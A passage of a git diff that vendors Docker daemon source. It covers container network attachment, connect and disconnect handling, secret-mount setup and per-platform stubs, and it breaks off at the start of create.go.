+func (daemon *Daemon) updateNetwork(container *container.Container) error { + var ( + start = time.Now() + ctrl = daemon.netController + sid = container.NetworkSettings.SandboxID + ) + + sb, err := ctrl.SandboxByID(sid) + if err != nil { + return fmt.Errorf("error locating sandbox id %s: %v", sid, err) + } + + // Find if container is connected to the default bridge network + var n libnetwork.Network + for name := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(name) + if err != nil { + continue + } + if sn.Name() == runconfig.DefaultDaemonNetworkMode().NetworkName() { + n = sn + break + } + } + + if n == nil { + // Not connected to the default bridge network; Nothing to do + return nil + } + + options, err := daemon.buildSandboxOptions(container) + if err != nil { + return fmt.Errorf("Update network failed: %v", err) + } + + if err := sb.Refresh(options...); err != nil { + return fmt.Errorf("Update network failed: Failure in refresh sandbox %s: %v", sid, err) + } + + networkActions.WithValues("update").UpdateSince(start) + + return nil +} + +func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrName string, epConfig *networktypes.EndpointSettings) (libnetwork.Network, *networktypes.NetworkingConfig, error) { + n, err := daemon.FindNetwork(idOrName) + if err != nil { + // We should always be able to find the network for a + // managed container. + if container.Managed { + return nil, nil, err + } + } + + // If we found a network and if it is not dynamically created + // we should never attempt to attach to that network here. 
+ if n != nil { + if container.Managed || !n.Info().Dynamic() { + return n, nil, nil + } + } + + var addresses []string + if epConfig != nil && epConfig.IPAMConfig != nil { + if epConfig.IPAMConfig.IPv4Address != "" { + addresses = append(addresses, epConfig.IPAMConfig.IPv4Address) + } + + if epConfig.IPAMConfig.IPv6Address != "" { + addresses = append(addresses, epConfig.IPAMConfig.IPv6Address) + } + } + + var ( + config *networktypes.NetworkingConfig + retryCount int + ) + + for { + // In all other cases, attempt to attach to the network to + // trigger attachment in the swarm cluster manager. + if daemon.clusterProvider != nil { + var err error + config, err = daemon.clusterProvider.AttachNetwork(idOrName, container.ID, addresses) + if err != nil { + return nil, nil, err + } + } + + n, err = daemon.FindNetwork(idOrName) + if err != nil { + if daemon.clusterProvider != nil { + if err := daemon.clusterProvider.DetachNetwork(idOrName, container.ID); err != nil { + logrus.Warnf("Could not rollback attachment for container %s to network %s: %v", container.ID, idOrName, err) + } + } + + // Retry network attach again if we failed to + // find the network after successfull + // attachment because the only reason that + // would happen is if some other container + // attached to the swarm scope network went down + // and removed the network while we were in + // the process of attaching. + if config != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok { + if retryCount >= 5 { + return nil, nil, fmt.Errorf("could not find network %s after successful attachment", idOrName) + } + retryCount++ + continue + } + } + + return nil, nil, err + } + + break + } + + // This container has attachment to a swarm scope + // network. Update the container network settings accordingly. 
+ container.NetworkSettings.HasSwarmEndpoint = true + return n, config, nil +} + +// updateContainerNetworkSettings update the network settings +func (daemon *Daemon) updateContainerNetworkSettings(container *container.Container, endpointsConfig map[string]*networktypes.EndpointSettings) { + var n libnetwork.Network + + mode := container.HostConfig.NetworkMode + if container.Config.NetworkDisabled || mode.IsContainer() { + return + } + + networkName := mode.NetworkName() + if mode.IsDefault() { + networkName = daemon.netController.Config().Daemon.DefaultNetwork + } + + if mode.IsUserDefined() { + var err error + + n, err = daemon.FindNetwork(networkName) + if err == nil { + networkName = n.Name() + } + } + + if container.NetworkSettings == nil { + container.NetworkSettings = &network.Settings{} + } + + if len(endpointsConfig) > 0 { + if container.NetworkSettings.Networks == nil { + container.NetworkSettings.Networks = make(map[string]*network.EndpointSettings) + } + + for name, epConfig := range endpointsConfig { + container.NetworkSettings.Networks[name] = &network.EndpointSettings{ + EndpointSettings: epConfig, + } + } + } + + if container.NetworkSettings.Networks == nil { + container.NetworkSettings.Networks = make(map[string]*network.EndpointSettings) + container.NetworkSettings.Networks[networkName] = &network.EndpointSettings{ + EndpointSettings: &networktypes.EndpointSettings{}, + } + } + + // Convert any settings added by client in default name to + // engine's default network name key + if mode.IsDefault() { + if nConf, ok := container.NetworkSettings.Networks[mode.NetworkName()]; ok { + container.NetworkSettings.Networks[networkName] = nConf + delete(container.NetworkSettings.Networks, mode.NetworkName()) + } + } + + if !mode.IsUserDefined() { + return + } + // Make sure to internally store the per network endpoint config by network name + if _, ok := container.NetworkSettings.Networks[networkName]; ok { + return + } + + if n != nil { + if nwConfig, ok := 
container.NetworkSettings.Networks[n.ID()]; ok { + container.NetworkSettings.Networks[networkName] = nwConfig + delete(container.NetworkSettings.Networks, n.ID()) + return + } + } +} + +func (daemon *Daemon) allocateNetwork(container *container.Container) error { + start := time.Now() + controller := daemon.netController + + if daemon.netController == nil { + return nil + } + + // Cleanup any stale sandbox left over due to ungraceful daemon shutdown + if err := controller.SandboxDestroy(container.ID); err != nil { + logrus.Errorf("failed to cleanup up stale network sandbox for container %s", container.ID) + } + + updateSettings := false + if len(container.NetworkSettings.Networks) == 0 { + if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() { + return nil + } + + daemon.updateContainerNetworkSettings(container, nil) + updateSettings = true + } + + // always connect default network first since only default + // network mode support link and we need do some setting + // on sandbox initialize for link, but the sandbox only be initialized + // on first network connecting. 
+ defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + if nConf, ok := container.NetworkSettings.Networks[defaultNetName]; ok { + cleanOperationalData(nConf) + if err := daemon.connectToNetwork(container, defaultNetName, nConf.EndpointSettings, updateSettings); err != nil { + return err + } + + } + + // the intermediate map is necessary because "connectToNetwork" modifies "container.NetworkSettings.Networks" + networks := make(map[string]*network.EndpointSettings) + for n, epConf := range container.NetworkSettings.Networks { + if n == defaultNetName { + continue + } + + networks[n] = epConf + } + + for netName, epConf := range networks { + cleanOperationalData(epConf) + if err := daemon.connectToNetwork(container, netName, epConf.EndpointSettings, updateSettings); err != nil { + return err + } + } + + if err := container.WriteHostConfig(); err != nil { + return err + } + networkActions.WithValues("allocate").UpdateSince(start) + return nil +} + +func (daemon *Daemon) getNetworkSandbox(container *container.Container) libnetwork.Sandbox { + var sb libnetwork.Sandbox + daemon.netController.WalkSandboxes(func(s libnetwork.Sandbox) bool { + if s.ContainerID() == container.ID { + sb = s + return true + } + return false + }) + return sb +} + +// hasUserDefinedIPAddress returns whether the passed endpoint configuration contains IP address configuration +func hasUserDefinedIPAddress(epConfig *networktypes.EndpointSettings) bool { + return epConfig != nil && epConfig.IPAMConfig != nil && (len(epConfig.IPAMConfig.IPv4Address) > 0 || len(epConfig.IPAMConfig.IPv6Address) > 0) +} + +// User specified ip address is acceptable only for networks with user specified subnets. 
+func validateNetworkingConfig(n libnetwork.Network, epConfig *networktypes.EndpointSettings) error { + if n == nil || epConfig == nil { + return nil + } + if !hasUserDefinedIPAddress(epConfig) { + return nil + } + _, _, nwIPv4Configs, nwIPv6Configs := n.Info().IpamConfig() + for _, s := range []struct { + ipConfigured bool + subnetConfigs []*libnetwork.IpamConf + }{ + { + ipConfigured: len(epConfig.IPAMConfig.IPv4Address) > 0, + subnetConfigs: nwIPv4Configs, + }, + { + ipConfigured: len(epConfig.IPAMConfig.IPv6Address) > 0, + subnetConfigs: nwIPv6Configs, + }, + } { + if s.ipConfigured { + foundSubnet := false + for _, cfg := range s.subnetConfigs { + if len(cfg.PreferredPool) > 0 { + foundSubnet = true + break + } + } + if !foundSubnet { + return runconfig.ErrUnsupportedNetworkNoSubnetAndIP + } + } + } + + return nil +} + +// cleanOperationalData resets the operational data from the passed endpoint settings +func cleanOperationalData(es *network.EndpointSettings) { + es.EndpointID = "" + es.Gateway = "" + es.IPAddress = "" + es.IPPrefixLen = 0 + es.IPv6Gateway = "" + es.GlobalIPv6Address = "" + es.GlobalIPv6PrefixLen = 0 + es.MacAddress = "" + if es.IPAMOperational { + es.IPAMConfig = nil + } +} + +func (daemon *Daemon) updateNetworkConfig(container *container.Container, n libnetwork.Network, endpointConfig *networktypes.EndpointSettings, updateSettings bool) error { + + if !containertypes.NetworkMode(n.Name()).IsUserDefined() { + if hasUserDefinedIPAddress(endpointConfig) && !enableIPOnPredefinedNetwork() { + return runconfig.ErrUnsupportedNetworkAndIP + } + if endpointConfig != nil && len(endpointConfig.Aliases) > 0 && !container.EnableServiceDiscoveryOnDefaultNetwork() { + return runconfig.ErrUnsupportedNetworkAndAlias + } + } else { + addShortID := true + shortID := stringid.TruncateID(container.ID) + for _, alias := range endpointConfig.Aliases { + if alias == shortID { + addShortID = false + break + } + } + if addShortID { + endpointConfig.Aliases = 
append(endpointConfig.Aliases, shortID) + } + } + + if err := validateNetworkingConfig(n, endpointConfig); err != nil { + return err + } + + if updateSettings { + if err := daemon.updateNetworkSettings(container, n, endpointConfig); err != nil { + return err + } + } + return nil +} + +func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName string, endpointConfig *networktypes.EndpointSettings, updateSettings bool) (err error) { + start := time.Now() + if container.HostConfig.NetworkMode.IsContainer() { + return runconfig.ErrConflictSharedNetwork + } + if containertypes.NetworkMode(idOrName).IsBridge() && + daemon.configStore.DisableBridge { + container.Config.NetworkDisabled = true + return nil + } + if endpointConfig == nil { + endpointConfig = &networktypes.EndpointSettings{} + } + + n, config, err := daemon.findAndAttachNetwork(container, idOrName, endpointConfig) + if err != nil { + return err + } + if n == nil { + return nil + } + + var operIPAM bool + if config != nil { + if epConfig, ok := config.EndpointsConfig[n.Name()]; ok { + if endpointConfig.IPAMConfig == nil || + (endpointConfig.IPAMConfig.IPv4Address == "" && + endpointConfig.IPAMConfig.IPv6Address == "" && + len(endpointConfig.IPAMConfig.LinkLocalIPs) == 0) { + operIPAM = true + } + + // copy IPAMConfig and NetworkID from epConfig via AttachNetwork + endpointConfig.IPAMConfig = epConfig.IPAMConfig + endpointConfig.NetworkID = epConfig.NetworkID + } + } + + err = daemon.updateNetworkConfig(container, n, endpointConfig, updateSettings) + if err != nil { + return err + } + + controller := daemon.netController + sb := daemon.getNetworkSandbox(container) + createOptions, err := container.BuildCreateEndpointOptions(n, endpointConfig, sb, daemon.configStore.DNS) + if err != nil { + return err + } + + endpointName := strings.TrimPrefix(container.Name, "/") + ep, err := n.CreateEndpoint(endpointName, createOptions...) 
+ if err != nil { + return err + } + defer func() { + if err != nil { + if e := ep.Delete(false); e != nil { + logrus.Warnf("Could not rollback container connection to network %s", idOrName) + } + } + }() + container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, + IPAMOperational: operIPAM, + } + if _, ok := container.NetworkSettings.Networks[n.ID()]; ok { + delete(container.NetworkSettings.Networks, n.ID()) + } + + if err := daemon.updateEndpointNetworkSettings(container, n, ep); err != nil { + return err + } + + if sb == nil { + options, err := daemon.buildSandboxOptions(container) + if err != nil { + return err + } + sb, err = controller.NewSandbox(container.ID, options...) + if err != nil { + return err + } + + container.UpdateSandboxNetworkSettings(sb) + } + + joinOptions, err := container.BuildJoinOptions(n) + if err != nil { + return err + } + + if err := ep.Join(sb, joinOptions...); err != nil { + return err + } + + if !container.Managed { + // add container name/alias to DNS + if err := daemon.ActivateContainerServiceBinding(container.Name); err != nil { + return fmt.Errorf("Activate container service binding for %s failed: %v", container.Name, err) + } + } + + if err := container.UpdateJoinInfo(n, ep); err != nil { + return fmt.Errorf("Updating join info failed: %v", err) + } + + container.NetworkSettings.Ports = getPortMapInfo(sb) + + daemon.LogNetworkEventWithAttributes(n, "connect", map[string]string{"container": container.ID}) + networkActions.WithValues("connect").UpdateSince(start) + return nil +} + +// ForceEndpointDelete deletes an endpoint from a network forcefully +func (daemon *Daemon) ForceEndpointDelete(name string, networkName string) error { + n, err := daemon.FindNetwork(networkName) + if err != nil { + return err + } + + ep, err := n.EndpointByName(name) + if err != nil { + return err + } + return ep.Delete(true) +} + +func (daemon *Daemon) disconnectFromNetwork(container 
*container.Container, n libnetwork.Network, force bool) error { + var ( + ep libnetwork.Endpoint + sbox libnetwork.Sandbox + ) + + s := func(current libnetwork.Endpoint) bool { + epInfo := current.Info() + if epInfo == nil { + return false + } + if sb := epInfo.Sandbox(); sb != nil { + if sb.ContainerID() == container.ID { + ep = current + sbox = sb + return true + } + } + return false + } + n.WalkEndpoints(s) + + if ep == nil && force { + epName := strings.TrimPrefix(container.Name, "/") + ep, err := n.EndpointByName(epName) + if err != nil { + return err + } + return ep.Delete(force) + } + + if ep == nil { + return fmt.Errorf("container %s is not connected to the network", container.ID) + } + + if err := ep.Leave(sbox); err != nil { + return fmt.Errorf("container %s failed to leave network %s: %v", container.ID, n.Name(), err) + } + + container.NetworkSettings.Ports = getPortMapInfo(sbox) + + if err := ep.Delete(false); err != nil { + return fmt.Errorf("endpoint delete failed for container %s on network %s: %v", container.ID, n.Name(), err) + } + + delete(container.NetworkSettings.Networks, n.Name()) + + if daemon.clusterProvider != nil && n.Info().Dynamic() && !container.Managed { + if err := daemon.clusterProvider.DetachNetwork(n.Name(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", n.Name(), err) + if err := daemon.clusterProvider.DetachNetwork(n.ID(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", n.ID(), err) + } + } + } + + return nil +} + +func (daemon *Daemon) initializeNetworking(container *container.Container) error { + var err error + + if container.HostConfig.NetworkMode.IsContainer() { + // we need to get the hosts files from the container to join + nc, err := daemon.getNetworkedContainer(container.ID, container.HostConfig.NetworkMode.ConnectedContainer()) + if err != nil { + return err + } + initializeNetworkingPaths(container, nc) + container.Config.Hostname = nc.Config.Hostname 
+ container.Config.Domainname = nc.Config.Domainname + return nil + } + + if container.HostConfig.NetworkMode.IsHost() { + if container.Config.Hostname == "" { + container.Config.Hostname, err = os.Hostname() + if err != nil { + return err + } + } + } + + if err := daemon.allocateNetwork(container); err != nil { + return err + } + + return container.BuildHostnameFile() +} + +func (daemon *Daemon) getNetworkedContainer(containerID, connectedContainerID string) (*container.Container, error) { + nc, err := daemon.GetContainer(connectedContainerID) + if err != nil { + return nil, err + } + if containerID == nc.ID { + return nil, fmt.Errorf("cannot join own network") + } + if !nc.IsRunning() { + err := fmt.Errorf("cannot join network of a non running container: %s", connectedContainerID) + return nil, derr.NewRequestConflictError(err) + } + if nc.IsRestarting() { + return nil, errContainerIsRestarting(connectedContainerID) + } + return nc, nil +} + +func (daemon *Daemon) releaseNetwork(container *container.Container) { + start := time.Now() + if daemon.netController == nil { + return + } + if container.HostConfig.NetworkMode.IsContainer() || container.Config.NetworkDisabled { + return + } + + sid := container.NetworkSettings.SandboxID + settings := container.NetworkSettings.Networks + container.NetworkSettings.Ports = nil + + if sid == "" || len(settings) == 0 { + return + } + + var networks []libnetwork.Network + for n, epSettings := range settings { + if nw, err := daemon.FindNetwork(n); err == nil { + networks = append(networks, nw) + } + + if epSettings.EndpointSettings == nil { + continue + } + + cleanOperationalData(epSettings) + } + + sb, err := daemon.netController.SandboxByID(sid) + if err != nil { + logrus.Warnf("error locating sandbox id %s: %v", sid, err) + return + } + + if err := sb.Delete(); err != nil { + logrus.Errorf("Error deleting sandbox id %s for container %s: %v", sid, container.ID, err) + } + + for _, nw := range networks { + if 
daemon.clusterProvider != nil && nw.Info().Dynamic() && !container.Managed { + if err := daemon.clusterProvider.DetachNetwork(nw.Name(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", nw.Name(), err) + if err := daemon.clusterProvider.DetachNetwork(nw.ID(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", nw.ID(), err) + } + } + } + + attributes := map[string]string{ + "container": container.ID, + } + daemon.LogNetworkEventWithAttributes(nw, "disconnect", attributes) + } + networkActions.WithValues("release").UpdateSince(start) +} + +func errRemovalContainer(containerID string) error { + return fmt.Errorf("Container %s is marked for removal and cannot be connected or disconnected to the network", containerID) +} + +// ConnectToNetwork connects a container to a network +func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName string, endpointConfig *networktypes.EndpointSettings) error { + if endpointConfig == nil { + endpointConfig = &networktypes.EndpointSettings{} + } + if !container.Running { + if container.RemovalInProgress || container.Dead { + return errRemovalContainer(container.ID) + } + + n, err := daemon.FindNetwork(idOrName) + if err == nil && n != nil { + if err := daemon.updateNetworkConfig(container, n, endpointConfig, true); err != nil { + return err + } + } else { + container.NetworkSettings.Networks[idOrName] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, + } + } + } else if !daemon.isNetworkHotPluggable() { + return fmt.Errorf(runtime.GOOS + " does not support connecting a running container to a network") + } else { + if err := daemon.connectToNetwork(container, idOrName, endpointConfig, true); err != nil { + return err + } + } + if err := container.ToDiskLocking(); err != nil { + return fmt.Errorf("Error saving container to disk: %v", err) + } + return nil +} + +// DisconnectFromNetwork disconnects container from network n. 
+func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, networkName string, force bool) error { + n, err := daemon.FindNetwork(networkName) + if !container.Running || (err != nil && force) { + if container.RemovalInProgress || container.Dead { + return errRemovalContainer(container.ID) + } + // In case networkName is resolved we will use n.Name() + // this will cover the case where network id is passed. + if n != nil { + networkName = n.Name() + } + if _, ok := container.NetworkSettings.Networks[networkName]; !ok { + return fmt.Errorf("container %s is not connected to the network %s", container.ID, networkName) + } + delete(container.NetworkSettings.Networks, networkName) + } else if err == nil && !daemon.isNetworkHotPluggable() { + return fmt.Errorf(runtime.GOOS + " does not support connecting a running container to a network") + } else if err == nil { + if container.HostConfig.NetworkMode.IsHost() && containertypes.NetworkMode(n.Type()).IsHost() { + return runconfig.ErrConflictHostNetwork + } + + if err := daemon.disconnectFromNetwork(container, n, false); err != nil { + return err + } + } else { + return err + } + + if err := container.ToDiskLocking(); err != nil { + return fmt.Errorf("Error saving container to disk: %v", err) + } + + if n != nil { + attributes := map[string]string{ + "container": container.ID, + } + daemon.LogNetworkEventWithAttributes(n, "disconnect", attributes) + } + return nil +} + +// ActivateContainerServiceBinding puts this container into load balancer active rotation and DNS response +func (daemon *Daemon) ActivateContainerServiceBinding(containerName string) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + sb := daemon.getNetworkSandbox(container) + if sb == nil { + return fmt.Errorf("network sandbox does not exist for container %s", containerName) + } + return sb.EnableService() +} + +// DeactivateContainerServiceBinding remove this container fromload balancer 
active rotation, and DNS response +func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + sb := daemon.getNetworkSandbox(container) + if sb == nil { + return fmt.Errorf("network sandbox does not exist for container %s", containerName) + } + return sb.DisableService() +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go new file mode 100644 index 0000000000..1653948de1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go @@ -0,0 +1,46 @@ +// +build solaris + +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" +) + +func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { + return nil, nil +} + +func (daemon *Daemon) setupIpcDirs(container *container.Container) error { + return nil +} + +func killProcessDirectly(container *container.Container) error { + return nil +} + +func detachMounted(path string) error { + return nil +} + +func isLinkable(child *container.Container) bool { + // A container is linkable only if it belongs to the default network + _, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + return ok +} + +func enableIPOnPredefinedNetwork() bool { + return false +} + +func (daemon *Daemon) isNetworkHotPluggable() bool { + return false +} + +func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { + return nil +} + +func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_unix.go b/vendor/github.com/docker/docker/daemon/container_operations_unix.go new file mode 
100644 index 0000000000..2296045765 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations_unix.go @@ -0,0 +1,281 @@ +// +build linux freebsd + +package daemon + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strconv" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/cloudflare/cfssl/log" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/links" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" + "github.com/opencontainers/runc/libcontainer/label" + "github.com/pkg/errors" +) + +func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { + var env []string + children := daemon.children(container) + + bridgeSettings := container.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + if bridgeSettings == nil || bridgeSettings.EndpointSettings == nil { + return nil, nil + } + + for linkAlias, child := range children { + if !child.IsRunning() { + return nil, fmt.Errorf("Cannot link to a non running container: %s AS %s", child.Name, linkAlias) + } + + childBridgeSettings := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + if childBridgeSettings == nil || childBridgeSettings.EndpointSettings == nil { + return nil, fmt.Errorf("container %s not attached to default bridge network", child.ID) + } + + link := links.NewLink( + bridgeSettings.IPAddress, + childBridgeSettings.IPAddress, + linkAlias, + child.Config.Env, + child.Config.ExposedPorts, + ) + + env = append(env, link.ToEnv()...) 
+ } + + return env, nil +} + +func (daemon *Daemon) getIpcContainer(container *container.Container) (*container.Container, error) { + containerID := container.HostConfig.IpcMode.Container() + c, err := daemon.GetContainer(containerID) + if err != nil { + return nil, err + } + if !c.IsRunning() { + return nil, fmt.Errorf("cannot join IPC of a non running container: %s", containerID) + } + if c.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return c, nil +} + +func (daemon *Daemon) getPidContainer(container *container.Container) (*container.Container, error) { + containerID := container.HostConfig.PidMode.Container() + c, err := daemon.GetContainer(containerID) + if err != nil { + return nil, err + } + if !c.IsRunning() { + return nil, fmt.Errorf("cannot join PID of a non running container: %s", containerID) + } + if c.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return c, nil +} + +func (daemon *Daemon) setupIpcDirs(c *container.Container) error { + var err error + + c.ShmPath, err = c.ShmResourcePath() + if err != nil { + return err + } + + if c.HostConfig.IpcMode.IsContainer() { + ic, err := daemon.getIpcContainer(c) + if err != nil { + return err + } + c.ShmPath = ic.ShmPath + } else if c.HostConfig.IpcMode.IsHost() { + if _, err := os.Stat("/dev/shm"); err != nil { + return fmt.Errorf("/dev/shm is not mounted, but must be for --ipc=host") + } + c.ShmPath = "/dev/shm" + } else { + rootUID, rootGID := daemon.GetRemappedUIDGID() + if !c.HasMountFor("/dev/shm") { + shmPath, err := c.ShmResourcePath() + if err != nil { + return err + } + + if err := idtools.MkdirAllAs(shmPath, 0700, rootUID, rootGID); err != nil { + return err + } + + shmSize := container.DefaultSHMSize + if c.HostConfig.ShmSize != 0 { + shmSize = c.HostConfig.ShmSize + } + shmproperty := "mode=1777,size=" + strconv.FormatInt(shmSize, 10) + if err := syscall.Mount("shm", shmPath, "tmpfs", 
uintptr(syscall.MS_NOEXEC|syscall.MS_NOSUID|syscall.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil { + return fmt.Errorf("mounting shm tmpfs: %s", err) + } + if err := os.Chown(shmPath, rootUID, rootGID); err != nil { + return err + } + } + + } + + return nil +} + +func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { + if len(c.SecretReferences) == 0 { + return nil + } + + localMountPath := c.SecretMountPath() + logrus.Debugf("secrets: setting up secret dir: %s", localMountPath) + + defer func() { + if setupErr != nil { + // cleanup + _ = detachMounted(localMountPath) + + if err := os.RemoveAll(localMountPath); err != nil { + log.Errorf("error cleaning up secret mount: %s", err) + } + } + }() + + // retrieve possible remapped range start for root UID, GID + rootUID, rootGID := daemon.GetRemappedUIDGID() + // create tmpfs + if err := idtools.MkdirAllAs(localMountPath, 0700, rootUID, rootGID); err != nil { + return errors.Wrap(err, "error creating secret local mount path") + } + tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootUID, rootGID) + if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to setup secret mount") + } + + for _, s := range c.SecretReferences { + if c.SecretStore == nil { + return fmt.Errorf("secret store is not initialized") + } + + // TODO (ehazlett): use type switch when more are supported + if s.File == nil { + return fmt.Errorf("secret target type is not a file target") + } + + targetPath := filepath.Clean(s.File.Name) + // ensure that the target is a filename only; no paths allowed + if targetPath != filepath.Base(targetPath) { + return fmt.Errorf("error creating secret: secret must not be a path") + } + + fPath := filepath.Join(localMountPath, targetPath) + if err := idtools.MkdirAllAs(filepath.Dir(fPath), 0700, rootUID, rootGID); err != nil { + return errors.Wrap(err, "error creating secret 
mount path") + } + + logrus.WithFields(logrus.Fields{ + "name": s.File.Name, + "path": fPath, + }).Debug("injecting secret") + secret := c.SecretStore.Get(s.SecretID) + if secret == nil { + return fmt.Errorf("unable to get secret from secret store") + } + if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil { + return errors.Wrap(err, "error injecting secret") + } + + uid, err := strconv.Atoi(s.File.UID) + if err != nil { + return err + } + gid, err := strconv.Atoi(s.File.GID) + if err != nil { + return err + } + + if err := os.Chown(fPath, rootUID+uid, rootGID+gid); err != nil { + return errors.Wrap(err, "error setting ownership for secret") + } + } + + // remount secrets ro + if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to remount secret dir as readonly") + } + + return nil +} + +func killProcessDirectly(container *container.Container) error { + if _, err := container.WaitStop(10 * time.Second); err != nil { + // Ensure that we don't kill ourselves + if pid := container.GetPID(); pid != 0 { + logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(container.ID)) + if err := syscall.Kill(pid, 9); err != nil { + if err != syscall.ESRCH { + return err + } + e := errNoSuchProcess{pid, 9} + logrus.Debug(e) + return e + } + } + } + return nil +} + +func detachMounted(path string) error { + return syscall.Unmount(path, syscall.MNT_DETACH) +} + +func isLinkable(child *container.Container) bool { + // A container is linkable only if it belongs to the default network + _, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + return ok +} + +func enableIPOnPredefinedNetwork() bool { + return false +} + +func (daemon *Daemon) isNetworkHotPluggable() bool { + return true +} + +func setupPathsAndSandboxOptions(container *container.Container, sboxOptions 
*[]libnetwork.SandboxOption) error { + var err error + + container.HostsPath, err = container.GetRootResourcePath("hosts") + if err != nil { + return err + } + *sboxOptions = append(*sboxOptions, libnetwork.OptionHostsPath(container.HostsPath)) + + container.ResolvConfPath, err = container.GetRootResourcePath("resolv.conf") + if err != nil { + return err + } + *sboxOptions = append(*sboxOptions, libnetwork.OptionResolvConfPath(container.ResolvConfPath)) + return nil +} + +func initializeNetworkingPaths(container *container.Container, nc *container.Container) { + container.HostnamePath = nc.HostnamePath + container.HostsPath = nc.HostsPath + container.ResolvConfPath = nc.ResolvConfPath +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_windows.go b/vendor/github.com/docker/docker/daemon/container_operations_windows.go new file mode 100644 index 0000000000..d05f251e05 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations_windows.go @@ -0,0 +1,59 @@ +// +build windows + +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/libnetwork" +) + +func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { + return nil, nil +} + +// getSize returns real size & virtual size +func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { + // TODO Windows + return 0, 0 +} + +func (daemon *Daemon) setupIpcDirs(container *container.Container) error { + return nil +} + +// TODO Windows: Fix Post-TP5. This is a hack to allow docker cp to work +// against containers which have volumes. You will still be able to cp +// to somewhere on the container drive, but not to any mounted volumes +// inside the container. Without this fix, docker cp is broken to any +// container which has a volume, regardless of where the file is inside the +// container. 
+func (daemon *Daemon) mountVolumes(container *container.Container) error { + return nil +} + +func detachMounted(path string) error { + return nil +} + +func killProcessDirectly(container *container.Container) error { + return nil +} + +func isLinkable(child *container.Container) bool { + return false +} + +func enableIPOnPredefinedNetwork() bool { + return true +} + +func (daemon *Daemon) isNetworkHotPluggable() bool { + return false +} + +func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { + return nil +} + +func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +} diff --git a/vendor/github.com/docker/docker/daemon/create.go b/vendor/github.com/docker/docker/daemon/create.go new file mode 100644 index 0000000000..c71d14e5fc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create.go @@ -0,0 +1,290 @@ +package daemon + +import ( + "fmt" + "net" + "runtime" + "strings" + "time" + + "github.com/pkg/errors" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + volumestore "github.com/docker/docker/volume/store" + "github.com/opencontainers/runc/libcontainer/label" +) + +// CreateManagedContainer creates a container that is managed by a Service +func (daemon *Daemon) CreateManagedContainer(params types.ContainerCreateConfig) (containertypes.ContainerCreateCreatedBody, error) { + return daemon.containerCreate(params, true) +} + +// ContainerCreate creates a regular container +func (daemon *Daemon) ContainerCreate(params 
